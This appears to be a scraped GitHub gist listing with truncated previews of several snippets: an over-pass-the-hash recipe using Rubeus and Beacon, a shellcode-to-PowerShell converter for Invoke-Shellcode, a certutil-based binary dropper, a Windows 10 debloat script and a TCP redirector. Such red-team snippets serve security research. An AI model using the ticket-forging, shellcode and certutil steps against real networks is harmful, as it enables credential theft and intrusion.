Chris Ross xorrior

@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Dec 9, 2020
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@alirobe
alirobe / reclaimWindows10.ps1
Last active Feb 21, 2021
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetry, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
View reclaimWindows10.ps1
##########
# Tweaked Win10 Initial Setup Script
# Primary Author: Disassembler <disassembler@dasm.cz>
# Modified by: alirobe <alirobe@alirobe.com> based on my personal preferences.
# Version: 2.20.2, 2018-09-14
# Primary Author Source: https://github.com/Disassembler0/Win10-Initial-Setup-Script
# Tweaked Source: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1/
# Tweak difference:
#
# @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ...
@byt3bl33d3r
byt3bl33d3r / raw2ps_shellcode.py
Created Sep 13, 2015
Converts raw shellcode to a PowerShell compatible byte array (helpful when using custom shellcode with Invoke-Shellcode.ps1)
View raw2ps_shellcode.py
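import sys

# Build a PowerShell byte-array literal from the raw file named in argv[1]
ps_shellcode = '@('
with open(sys.argv[1], 'rb') as shellcode:
    byte = shellcode.read(1)
    # In Python 3, read(1) on a binary file returns b'' at end of file
    while byte != b'':
        ps_shellcode += '0x{}, '.format(byte.hex())
        byte = shellcode.read(1)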
@mattifestation
mattifestation / drop_binary.bat
Created Jul 12, 2015
Drop binary data from the command line w/o needing PowerShell
View drop_binary.bat
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
@sivachandran
sivachandran / SimpleTcpRedirector.py
Created Mar 4, 2012
A simple TCP redirector in python
View SimpleTcpRedirector.py
#!/usr/bin/env python
import socket
import threading
import select
import sys
terminateAll = False
class ClientThread(threading.Thread):